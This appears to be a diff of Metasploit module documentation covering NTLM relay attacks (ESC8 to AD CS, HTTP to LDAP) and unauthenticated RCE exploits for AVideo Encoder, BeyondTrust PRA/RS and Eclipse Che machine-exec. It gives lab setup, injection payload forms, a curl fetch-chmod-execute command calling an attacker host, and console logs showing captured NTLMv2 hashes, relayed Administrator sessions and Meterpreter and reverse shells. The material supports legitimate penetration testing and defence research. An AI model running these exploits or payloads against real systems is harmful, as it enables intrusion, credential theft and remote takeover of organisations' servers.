SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an
|
||||
address on the local machine or 0.0.0.0 to listen on all address
|
||||
es.
|
||||
SRVPORT 445 yes The local port to listen on.
|
||||
SRV_TIMEOUT 25 yes Seconds that the server socket will wait for a response after the
|
||||
client has initiated communication.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI /certsrv/ yes The URI for the cert server.
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When MODE is SPECIFIC_TEMPLATE:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CERT_TEMPLATE User no The template to issue if MODE is SPECIFIC_TEMPLATE.
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
Relay Run SMB ESC8 relay server
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf auxiliary(server/relay/esc8) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf auxiliary(server/relay/esc8) >
|
||||
[*] SMB Server is running. Listening on 0.0.0.0:445
|
||||
[*] Server started.
|
||||
[*] New request from 10.5.132.122
|
||||
[*] Received request for \msfuser
|
||||
[*] Relaying to next target http://10.5.132.180:80/certsrv/
|
||||
[+] Identity: \msfuser - Successfully authenticated against relay target http://10.5.132.180:80/certsrv/
|
||||
[SMB] NTLMv2-SSP Client : 10.5.132.180
|
||||
[SMB] NTLMv2-SSP Username : \msfuser
|
||||
[SMB] NTLMv2-SSP Hash : msfuser:::916940a20e939a34:7f5150c74cba44513fcb2e7ed28e8f45:0101000000000000bf1765b93787dc01c7c75e835e16b4ad0000000002000e004500580041004d0050004c00450001001e00570049004e002d00440052004300390048004300440049004d0041005400040016006500780061006d0070006c0065002e0063006f006d0003003600570049004e002d00440052004300390048004300440049004d00410054002e006500780061006d0070006c0065002e0063006f006d00050016006500780061006d0070006c0065002e0063006f006d0007000800bf1765b93787dc01060004000200000008003000300000000000000000000000003000002ad3656a59fe53f773d5bc3852373338e1f3270cdbdf9411b84ef184151925510a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000
|
||||
|
||||
[+] Certificate generated using template User and \msfuser
|
||||
[+] Certificate for \msfuser using template User saved to /home/tmoose/.msf4/loot/20260116163102_default_10.5.132.180_windows.ad.cs_883392.pfx
|
||||
[*] Received request for \msfuser
|
||||
[*] Identity: \msfuser - All targets relayed to
|
||||
|
||||
|
||||
```
|
||||
@@ -0,0 +1,108 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module sets up an HTTP server that attempts to execute an NTLM relay attack against an LDAP server on the
|
||||
configured `RHOSTS`. The relay attack targets NTLMv1 authentication, as NTLMv2 cannot be relayed to LDAP due to the
|
||||
Message Integrity Check (MIC). The module automatically removes the relevant flags to bypass signing.
|
||||
|
||||
This module supports relaying one HTTP authentication attempt to multiple LDAP servers. After attempting to relay to
|
||||
one target, the relay server sends a 307 to the client and if the client is configured to respond to redirects, the
|
||||
client resends the NTLMSSP_NEGOTIATE request to the relay server. Multi relay will not work if the client does not
|
||||
respond to redirects.
|
||||
|
||||
The module supports relaying NTLM authentication which has been wrapped in GSS-SPNEGO. HTTP authentication info is sent
|
||||
in the WWW-Authenticate header. In the auth header base64 encoded NTLM messages are denoted with the NTLM prefix, while
|
||||
GSS wrapped NTLM messages are denoted with the Negotiate prefix. Note that in some cases non-GSS wrapped NTLM auth can
|
||||
be prefixed with Negotiate.
|
||||
|
||||
If the relay attack is successful, an LDAP session is created on the target. This session can be used by other modules
|
||||
that support LDAP sessions, such as:
|
||||
|
||||
- `admin/ldap/rbcd`
|
||||
- `auxiliary/gather/ldap_query`
|
||||
|
||||
The module also supports capturing NTLMv1 and NTLMv2 hashes.
|
||||
|
||||
### Setup
|
||||
|
||||
For this relay attack to be successful, it is important to understand the difference between the Target Server (the
|
||||
Domain Controller receiving the relayed authentication) and the Victim Client (the machine sending the initial HTTP
|
||||
request) and how their respective configurations can impact the success of the attack.
|
||||
|
||||
The Domain Controller must be configured to accept LM or NTLM authentication. This means the `LmCompatibilityLevel`
|
||||
registry key on the DC must be set to 4 or lower. If it is set to `5` ("Send NTLMv2 response only. Refuse
|
||||
LM and NTLM"), the DC will reject the relayed authentication and the module will fail.
|
||||
|
||||
You can verify or modify the Domain Controller's level using the following commands:
|
||||
```cmd
|
||||
# To check the current level:
|
||||
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel
|
||||
|
||||
# To set the level to 4 (or lower):
|
||||
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel /t REG_DWORD /d 0x4 /f
|
||||
```
|
||||
|
||||
The client being coerced must be willing to send the vulnerable NTLM responses.
|
||||
- Non-Windows Clients: Custom tools or Linux-based HTTP clients are unaffected by Windows registry keys and can easily
|
||||
be relayed to a vulnerable DC.
|
||||
- Windows Clients: If you are coercing a native Windows HTTP client (like `Invoke-WebRequest` or a browser), the victim
|
||||
machine's `LmCompatibilityLevel` dictates what it is allowed to send. To successfully relay a Windows client, its local
|
||||
registry key typically needs to be set to `2` or lower. If the Windows client is operating at level `3` or higher, it
|
||||
restricts itself to sending only NTLMv2 responses, which will cause the relay to fail even if the target DC is vulnerable.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/server/relay/http_to_ldap`
|
||||
3. Set the `RHOSTS` options
|
||||
4. Run the module
|
||||
5. Send an authentication attempt to the relay server
|
||||
6. `Invoke-WebRequest -Uri http://192.0.2.1/test -UseDefaultCredentials`
|
||||
7. Check the output for successful relays and captured hashes
|
||||
|
||||
## Scenarios
|
||||
### Relaying to multiple targets
|
||||
```
|
||||
msf auxiliary(server/relay/http_to_ldap) > set rhosts 172.16.199.200 172.16.199.201
|
||||
rhosts => 172.16.199.200 172.16.199.201
|
||||
msf auxiliary(server/relay/http_to_ldap) > run
|
||||
[*] Auxiliary module running as background job 2.
|
||||
|
||||
[*] Relay Server started on 0.0.0.0:80
|
||||
[*] Server started.
|
||||
msf auxiliary(server/relay/http_to_ldap) > [*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
|
||||
[*] Processing request in state unauthenticated from 172.16.199.130
|
||||
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
|
||||
[*] Processing request in state unauthenticated from 172.16.199.130
|
||||
[*] Received Type 1 message from 172.16.199.130, attempting to relay...
|
||||
[*] Attempting to relay to ldap://172.16.199.201:389
|
||||
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
|
||||
[*] Received type2 from target ldap://172.16.199.201:389, attempting to relay back to client
|
||||
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
|
||||
[*] Processing request in state awaiting_type3 from 172.16.199.130
|
||||
[*] Received Type 3 message from 172.16.199.130, attempting to relay...
|
||||
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
|
||||
[+] Identity: KERBEROS\Administrator - Successfully relayed NTLM authentication to LDAP!
|
||||
[+] Relay succeeded
|
||||
[*] Moving to next target (172.16.199.200). Issuing 307 Redirect to /ZdF7Ufkm0I
|
||||
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
|
||||
[*] Processing request in state unauthenticated from 172.16.199.130
|
||||
[*] Received Type 1 message from 172.16.199.130, attempting to relay...
|
||||
[*] Attempting to relay to ldap://172.16.199.200:389
|
||||
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
|
||||
[*] Received type2 from target ldap://172.16.199.200:389, attempting to relay back to client
|
||||
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
|
||||
[*] Processing request in state awaiting_type3 from 172.16.199.130
|
||||
[*] Received Type 3 message from 172.16.199.130, attempting to relay...
|
||||
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
|
||||
[+] Identity: KERBEROS\Administrator - Successfully relayed NTLM authentication to LDAP!
|
||||
[+] Relay succeeded
|
||||
[*] Target list exhausted for 172.16.199.130. Closing connection.
|
||||
msf auxiliary(server/relay/http_to_ldap) > sessions -i -1
|
||||
[*] Starting interaction with 5...
|
||||
|
||||
LDAP (172.16.199.200) > getuid
|
||||
[*] Server username: KERBEROS\Administrator
|
||||
LDAP (172.16.199.200) >
|
||||
```
|
||||
@@ -0,0 +1,171 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits an unauthenticated OS command injection vulnerability in AVideo
|
||||
Encoder's `getImage.php` endpoint.
|
||||
|
||||
**CVE ID:** CVE-2026-29058
|
||||
|
||||
**Affected Versions:** AVideo Encoder before version 7.0 (commit 78178d1)
|
||||
|
||||
### Vulnerability Overview
|
||||
|
||||
The `getImage.php` endpoint accepts a `base64Url` GET parameter which is base64-decoded and
|
||||
passed through PHP's `FILTER_VALIDATE_URL`. The validated URL is then interpolated directly
|
||||
into an ffmpeg shell command within double quotes, without any use of `escapeshellarg()` or
|
||||
metacharacter filtering.
|
||||
|
||||
PHP's `FILTER_VALIDATE_URL` does not block shell metacharacters such as backticks or `$()`
|
||||
in the URL path component. A crafted URL like `http://x/$(cmd)` passes validation and gets
|
||||
interpolated into:
|
||||
|
||||
```
|
||||
ffmpeg -i "http://x/$(cmd)" -f image2 ...
|
||||
```
|
||||
|
||||
This results in arbitrary command execution as `www-data`. The Encoder code is served by the
|
||||
main AVideo Apache container (mounted at `/Encoder`), so exploitation gives access to the
|
||||
main application context including database credentials and configuration.
|
||||
|
||||
Fixed in AVideo Encoder version 7.0 (commit `78178d1`) which added `escapeshellarg()` and
|
||||
shell metacharacter stripping.
|
||||
|
||||
### Setup
|
||||
|
||||
This lab reuses the same AVideo Docker environment as the `avideo_notify_ffmpeg_unauth_rce`
|
||||
module, with one additional step: reverting the Encoder to the pre-patch (vulnerable)
|
||||
version.
|
||||
|
||||
1. Clone the AVideo repository and checkout the vulnerable commit:
|
||||
|
||||
```bash
|
||||
cd /tmp
|
||||
git clone https://github.com/WWBN/AVideo.git
|
||||
cd AVideo
|
||||
git checkout 596df4e5b0597c9806da76ebec5bbe3b305953e4
|
||||
```
|
||||
|
||||
2. Create a `.env` file with the following configuration:
|
||||
|
||||
```bash
|
||||
cat > .env << EOF
|
||||
SERVER_NAME=localhost
|
||||
CREATE_TLS_CERTIFICATE=yes
|
||||
DB_MYSQL_HOST=database
|
||||
DB_MYSQL_PORT=3306
|
||||
DB_MYSQL_NAME=avideo
|
||||
DB_MYSQL_USER=avideo
|
||||
DB_MYSQL_PASSWORD=avideo
|
||||
HTTP_PORT=80
|
||||
HTTPS_PORT=9443
|
||||
NETWORK_SUBNET=172.99.0.0/16
|
||||
EOF
|
||||
```
|
||||
|
||||
3. Fix MariaDB corrupted tc.log issue (required for first-time setup):
|
||||
|
||||
```bash
|
||||
cat > deploy/docker-entrypoint-mariadb << 'SCRIPTEOF'
|
||||
#!/bin/bash
|
||||
set -e
|
||||
|
||||
if [ -f /var/lib/mysql/tc.log ]; then
|
||||
MAGIC_HEADER=$(head -c 4 /var/lib/mysql/tc.log | od -An -tx1 | tr -d ' \n' 2>/dev/null || echo "")
|
||||
if [ "$MAGIC_HEADER" != "01000000" ] && [ -n "$MAGIC_HEADER" ]; then
|
||||
echo "[Entrypoint]: Removing corrupted tc.log file (bad magic header: $MAGIC_HEADER)"
|
||||
rm -f /var/lib/mysql/tc.log
|
||||
fi
|
||||
fi
|
||||
SCRIPTEOF
|
||||
chmod +x deploy/docker-entrypoint-mariadb
|
||||
|
||||
cat >> Dockerfile.mariadb << 'DOCKERFILEEOF'
|
||||
|
||||
COPY deploy/docker-entrypoint-mariadb /usr/local/bin/docker-entrypoint-mariadb
|
||||
RUN chmod +x /usr/local/bin/docker-entrypoint-mariadb
|
||||
RUN sed -i '2i /usr/local/bin/docker-entrypoint-mariadb' /usr/local/bin/docker-entrypoint.sh
|
||||
DOCKERFILEEOF
|
||||
|
||||
docker compose build database database_encoder
|
||||
```
|
||||
|
||||
4. Start the Docker Compose environment:
|
||||
|
||||
```bash
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
5. Wait for the `avideo` container to finish its entrypoint (this takes 1-2 minutes).
|
||||
The entrypoint clones the Encoder repo into `.compose/encoder` and runs the database
|
||||
installer. However, the Docker image ships with a pre-existing `configuration.php`, so
|
||||
the CLI installer skips table creation. Fix the database permissions and initialize the
|
||||
tables manually:
|
||||
|
||||
```bash
|
||||
docker exec avideo-database-1 chown -R mysql:mysql /var/lib/mysql/
|
||||
|
||||
docker exec avideo-avideo-1 bash -c "
|
||||
mv /var/www/html/AVideo/videos/configuration.php /var/www/html/AVideo/videos/configuration.php.bak
|
||||
cd /var/www/html/AVideo/install && php cli.php
|
||||
mv /var/www/html/AVideo/videos/configuration.php.bak /var/www/html/AVideo/videos/configuration.php
|
||||
"
|
||||
```
|
||||
|
||||
Verify that `http://localhost` returns the AVideo interface before proceeding.
|
||||
|
||||
6. Revert the Encoder to the pre-patch (vulnerable) version.
|
||||
The `.compose/encoder` directory is a git clone of
|
||||
[WWBN/AVideo-Encoder](https://github.com/WWBN/AVideo-Encoder), created automatically
|
||||
by the container entrypoint. The security fix in commit `78178d1` patched multiple files
|
||||
(not just `getImage.php`), so the entire working tree must be reverted:
|
||||
|
||||
```bash
|
||||
docker exec avideo-avideo-1 bash -c "
|
||||
git config --global --add safe.directory /var/www/html/AVideo/Encoder
|
||||
cd /var/www/html/AVideo/Encoder && git checkout 78178d1~1 -- .
|
||||
"
|
||||
docker compose restart avideo
|
||||
```
|
||||
|
||||
After this step, the `/Encoder/objects/getImage.php` endpoint is vulnerable to command
|
||||
injection via the `base64Url` parameter.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use exploit/linux/http/avideo_encoder_getimage_cmd_injection`
|
||||
3. `set RHOSTS <target_ip>`
|
||||
4. `set RPORT <target_port>` (default: 80)
|
||||
5. `set LHOST <your_ip>` (for reverse connection)
|
||||
6. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
|
||||
7. `set FETCH_SRVPORT <available_port>` (if default 8080 is taken)
|
||||
8. `exploit`
|
||||
9. **Verify** that you get a Meterpreter session
|
||||
|
||||
## Options
|
||||
|
||||
This module has no non-default options.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Meterpreter via fetch payload (cmd/linux/http/x64/meterpreter/reverse_tcp)
|
||||
|
||||
This scenario demonstrates exploitation against AVideo with a vulnerable Encoder, using a
|
||||
fetch payload to deliver a Meterpreter binary:
|
||||
|
||||
```
|
||||
msf exploit(linux/http/avideo_encoder_getimage_cmd_injection) > set RHOSTS localhost
|
||||
RHOSTS => localhost
|
||||
msf exploit(linux/http/avideo_encoder_getimage_cmd_injection) > set RPORT 80
|
||||
RPORT => 80
|
||||
msf exploit(linux/http/avideo_encoder_getimage_cmd_injection) > set LHOST 172.99.0.1
|
||||
LHOST => 172.99.0.1
|
||||
msf exploit(linux/http/avideo_encoder_getimage_cmd_injection) > exploit
|
||||
[*] Started reverse TCP handler on 172.99.0.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. Command injection confirmed via sleep timing (3/3 checks passed)
|
||||
[*] Sending command injection via getImage.php...
|
||||
[*] Sending stage (3090404 bytes) to 172.99.0.7
|
||||
[*] Meterpreter session 1 opened (172.99.0.1:4444 -> 172.99.0.7:46970) at 2026-03-06 21:26:32 +0100
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,60 @@
|
||||
## Vulnerable Application
|
||||
This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
|
||||
Access (PRA) and Remote Support (RS) by leveraging CVE-2026-1731, an OS command injection vulnerability.
|
||||
The injected command is executed with the privileges of the site user of the targeted BeyondTrust product site.
|
||||
Affected version are versions `25.3.1` and prior for Remote Support (RS), versions `24.3.4` and prior for Privileged Remote Access (PRA).
|
||||
The vulnerability exists in the WebSocket-based support desk customer interface. The module establishes a
|
||||
WebSocket connection to the vulnerable endpoint and injects an OS command via a Bash arithmetic evaluation
|
||||
context (`a[$(command)]0`).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. `use exploit/linux/http/beyondtrust_pra_rs_command_injection`
|
||||
3. `set RHOSTS <TARGET_IP_ADDRESS>`
|
||||
4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
|
||||
5. `set LHOST <ATTACKER_IP_ADDRESS>`
|
||||
6. `set LPORT 4444`
|
||||
7. `check`
|
||||
8. `exploit`
|
||||
|
||||
## Options
|
||||
|
||||
### TargetCompanyName (Advanced)
|
||||
If set, use this name value to identify the company name of the deployed site (e.g. `mytestcompany`).
|
||||
By default, this is auto discovered by querying the target.
|
||||
|
||||
### TargetServerFQDN (Advanced)
|
||||
If set, use this FQDN value to identify the FQDN of the deployed site (e.g. `support.mytestcompany.com`).
|
||||
By default, this is auto discovered by querying the target.
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf exploit(linux/http/beyondtrust_pra_rs_command_injection) > run verbose=true
|
||||
[*] Command to run on remote host: curl -so /var/tmp/sjlnZMOtljNA http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w;chmod +x /var/tmp/sjlnZMOtljNA;/var/tmp/sjlnZMOtljNA&sleep 3;rm -rf /var/tmp/sjlnZMOtljNA
|
||||
[*] Fetch handler listening on 192.168.3.7:8080
|
||||
[*] HTTP server started
|
||||
[*] Adding resource /EO6WzfXF6CGyqdBiy1rT5w
|
||||
[*] Started reverse TCP handler on 192.168.3.7:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Detected version 24.1.2
|
||||
[*] Got site info via the /get_mech_list?version=3 endpoint.
|
||||
[*] Company name: mytestcompany
|
||||
[*] Site FQDN:
|
||||
[*] Using company name: mytestcompany
|
||||
[*] Client 10.5.132.179 requested /EO6WzfXF6CGyqdBiy1rT5w
|
||||
[*] Sending payload to 10.5.132.179 (curl/8.5.0)
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3090404 bytes) to 10.5.132.179
|
||||
[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.132.179:33578) at 2026-02-24 16:14:36 +0100
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : bombur
|
||||
OS : Gentoo 2.14 (Linux 6.1.76-bt)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > exit
|
||||
|
||||
```
|
||||
@@ -0,0 +1,254 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits an unauthenticated remote code execution vulnerability (CVE-2025-12548) in the Eclipse Che
|
||||
machine-exec service. The machine-exec service, exposed on port 3333 within Red Hat OpenShift DevSpaces developer
|
||||
workspace containers, accepts WebSocket connections without authentication.
|
||||
|
||||
An attacker can connect to the machine-exec service and execute arbitrary commands via JSON-RPC over WebSocket.
|
||||
This allows lateral movement between workspaces and potential cluster compromise.
|
||||
|
||||
Affected versions: Red Hat OpenShift Dev Spaces prior to patches RHSA-2025:22620, RHSA-2025:22652, RHSA-2025:22623.
|
||||
|
||||
## Vulnerable Environment Setup
|
||||
|
||||
The `che-machine-exec` binary runs directly on your host machine, not inside `minikube`. It uses
|
||||
the Kubernetes in-cluster client config which looks for credentials at
|
||||
`/var/run/secrets/kubernetes.io/serviceaccount/` on whatever machine the binary is running on.
|
||||
|
||||
### Prerequisites
|
||||
|
||||
- Linux host with `Docker` installed (should also work on macOS)
|
||||
- [`minikube`](https://minikube.sigs.k8s.io/docs/start/) installed
|
||||
- `kubectl` installed, or use `minikube kubectl --` as a built-in alternative
|
||||
- [`Go`](https://go.dev/dl/) installed (tested with `go1.24`)
|
||||
|
||||
Install `minikube` (Linux):
|
||||
|
||||
```
|
||||
curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64
|
||||
sudo install minikube-linux-amd64 /usr/local/bin/minikube
|
||||
```
|
||||
|
||||
Install `kubectl` (Linux):
|
||||
|
||||
```
|
||||
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
|
||||
sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
|
||||
```
|
||||
|
||||
### 1. Start minikube
|
||||
|
||||
```
|
||||
minikube start --driver=docker \
|
||||
--memory=4096 \
|
||||
--cpus=2 \
|
||||
--disk-size=20g
|
||||
```
|
||||
|
||||
### 2. Build from source
|
||||
|
||||
```
|
||||
git clone https://github.com/eclipse-che/che-machine-exec.git
|
||||
cd che-machine-exec
|
||||
go build -o che-machine-exec-vuln .
|
||||
```
|
||||
|
||||
The `main` branch does not enforce authentication on the WebSocket routes. The service is designed to sit behind an OAuth proxy and Kubernetes network policies.
|
||||
|
||||
### 3. Create a Kubernetes service account
|
||||
|
||||
```
|
||||
kubectl create namespace eclipse-che
|
||||
kubectl create serviceaccount machine-exec-test -n eclipse-che
|
||||
kubectl create clusterrolebinding machine-exec-test \
|
||||
--clusterrole=cluster-admin \
|
||||
--serviceaccount=eclipse-che:machine-exec-test
|
||||
```
|
||||
|
||||
### 4. Deploy a target pod
|
||||
|
||||
The binary needs a running pod matching its pod selector. Use `ubuntu` (not `busybox`) so
|
||||
that reverse shell payloads have access to `bash`:
|
||||
|
||||
```
|
||||
kubectl run target-workspace \
|
||||
--image=ubuntu:latest \
|
||||
--restart=Never \
|
||||
-n eclipse-che \
|
||||
--labels="che.workspace_id=test-workspace-id" \
|
||||
-- sleep 3600
|
||||
```
|
||||
|
||||
Wait until the pod is running:
|
||||
|
||||
```
|
||||
kubectl get pod target-workspace -n eclipse-che
|
||||
```
|
||||
|
||||
### 5. Populate the in-cluster credentials directory
|
||||
|
||||
Populate with real `minikube` values:
|
||||
|
||||
```
|
||||
sudo mkdir -p /var/run/secrets/kubernetes.io/serviceaccount
|
||||
|
||||
kubectl -n eclipse-che create token machine-exec-test | \
|
||||
sudo tee /var/run/secrets/kubernetes.io/serviceaccount/token > /dev/null
|
||||
|
||||
sudo cp \
|
||||
$(kubectl config view --raw -o jsonpath='{.clusters[?(@.name=="minikube")].cluster.certificate-authority}') \
|
||||
/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
|
||||
|
||||
printf "eclipse-che" | sudo tee /var/run/secrets/kubernetes.io/serviceaccount/namespace > /dev/null
|
||||
```
|
||||
|
||||
Verify the CA cert is populated:
|
||||
|
||||
```
|
||||
head -1 /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
|
||||
```
|
||||
|
||||
### 6. Start the server
|
||||
|
||||
```
|
||||
export KUBERNETES_SERVICE_HOST=$(minikube ip)
|
||||
export KUBERNETES_SERVICE_PORT=8443
|
||||
export CHE_WORKSPACE_NAME=dummy-workspace
|
||||
export DEVWORKSPACE_NAME=dummy-devworkspace
|
||||
|
||||
./che-machine-exec-vuln \
|
||||
-url 0.0.0.0:3333 \
|
||||
-static /tmp/static \
|
||||
-pod-selector "che.workspace_id=test-workspace-id" \
|
||||
-idle-timeout 24h
|
||||
```
|
||||
|
||||
Expected output:
|
||||
|
||||
```
|
||||
[GIN-debug] Listening and serving HTTP on 0.0.0.0:3333
|
||||
```
|
||||
|
||||
### 7. Verify the service is reachable
|
||||
|
||||
```
|
||||
curl http://127.0.0.1:3333/healthz
|
||||
```
|
||||
|
||||
### Notes
|
||||
|
||||
- `LHOST` must not be `127.0.0.1` when testing. The reverse shell originates from inside the
|
||||
`minikube` pod, which cannot reach the host loopback. Use the `minikube` gateway IP instead
|
||||
(typically `192.168.49.1`, confirm with `minikube ssh "ip route | grep default"`).
|
||||
- The token from `kubectl create token` expires after 1 hour by default. Regenerate it
|
||||
by repeating step 5 if the server starts returning `Unauthorized` errors.
|
||||
- The target pod sleeps for 1 hour. Recreate it if it exits before testing is complete.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use exploit/linux/http/eclipse_che_machine_exec_rce`
|
||||
3. `set RHOSTS <target>`
|
||||
4. `set LHOST <your_ip>`
|
||||
5. `check`
|
||||
6. `exploit`
|
||||
7. Verify you get a shell session
|
||||
|
||||
## Options
|
||||
|
||||
### TARGETURI
|
||||
Base path to the machine-exec service. Default: `/`
|
||||
|
||||
### WS_TIMEOUT
|
||||
Timeout for WebSocket operations in seconds. Default: `10`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Red Hat OpenShift DevSpaces (cmd/unix/reverse_bash)
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/eclipse_che_machine_exec_rce
|
||||
[*] Using configured payload cmd/unix/reverse_bash
|
||||
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > set RHOSTS 192.168.1.10
|
||||
RHOSTS => 192.168.1.10
|
||||
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > set LHOST 192.168.1.10
|
||||
LHOST => 192.168.1.10
|
||||
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > check
|
||||
[+] 192.168.1.10:3333 - The target is vulnerable. machine-exec service accepts unauthenticated connections
|
||||
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > exploit
|
||||
[*] Started reverse TCP handler on 0.0.0.0:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. machine-exec service accepts unauthenticated connections
|
||||
[*] Connecting to machine-exec service...
|
||||
[+] Connected to machine-exec service
|
||||
[*] Staging payload via JSON-RPC create method...
|
||||
[+] Command staged with process ID: 2
|
||||
[*] Triggering execution via /attach/2...
|
||||
[+] Payload triggered!
|
||||
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:47578) at 2025-12-30 19:46:55 +0000
|
||||
|
||||
whoami
|
||||
user
|
||||
```
|
||||
|
||||
### Red Hat OpenShift DevSpaces (linux/x64/meterpreter/reverse_tcp)
|
||||
|
||||
```
|
||||
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > set TARGET 1
|
||||
TARGET => 1
|
||||
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > set RHOSTS 192.168.1.10
|
||||
RHOSTS => 192.168.1.10
|
||||
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > set LHOST 192.168.1.10
|
||||
LHOST => 192.168.1.10
|
||||
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > run
|
||||
[*] Started reverse TCP handler on 0.0.0.0:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. machine-exec service accepts unauthenticated connections
|
||||
[*] Connecting to machine-exec service...
|
||||
[+] Connected to machine-exec service
|
||||
[*] Staging payload via JSON-RPC create method...
|
||||
[+] Command staged with process ID: 1
|
||||
[*] Triggering execution via /attach/1...
|
||||
[+] Payload triggered!
|
||||
[*] Sending stage (3090404 bytes) to 127.0.0.1
|
||||
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:41234) at 2025-12-31 15:21:40 +0000
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 10.244.0.15
|
||||
OS : Red Hat Enterprise Linux 9 (Linux 5.14.0-570.45.1.el9_6.x86_64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > getuid
|
||||
Server username: user
|
||||
meterpreter > pwd
|
||||
/projects
|
||||
meterpreter > shell
|
||||
Process 672 created.
|
||||
Channel 1 created.
|
||||
cat /etc/os-release
|
||||
NAME="Red Hat Enterprise Linux"
|
||||
VERSION="9.6 (Plow)"
|
||||
ID="rhel"
|
||||
ID_LIKE="fedora"
|
||||
VERSION_ID="9.6"
|
||||
PLATFORM_ID="platform:el9"
|
||||
PRETTY_NAME="Red Hat Enterprise Linux 9.6 (Plow)"
|
||||
ANSI_COLOR="0;31"
|
||||
LOGO="fedora-logo-icon"
|
||||
CPE_NAME="cpe:/o:redhat:enterprise_linux:9::baseos"
|
||||
HOME_URL="https://www.redhat.com/"
|
||||
DOCUMENTATION_URL="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9"
|
||||
BUG_REPORT_URL="https://issues.redhat.com/"
|
||||
|
||||
REDHAT_BUGZILLA_PRODUCT="Red Hat Enterprise Linux 9"
|
||||
REDHAT_BUGZILLA_PRODUCT_VERSION=9.6
|
||||
REDHAT_SUPPORT_PRODUCT="Red Hat Enterprise Linux"
|
||||
REDHAT_SUPPORT_PRODUCT_VERSION="9.6"
|
||||
uname -a
|
||||
Linux workspace1a2b3c4d5e6f7890-abc123def4-xyzpq 5.14.0-570.45.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Sep 13 01:15:12 EDT 2025 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,134 @@
|
||||
## Vulnerable Application
|
||||
An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint
|
||||
/cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote
|
||||
code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models
|
||||
in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630. The vulnerability affects all
|
||||
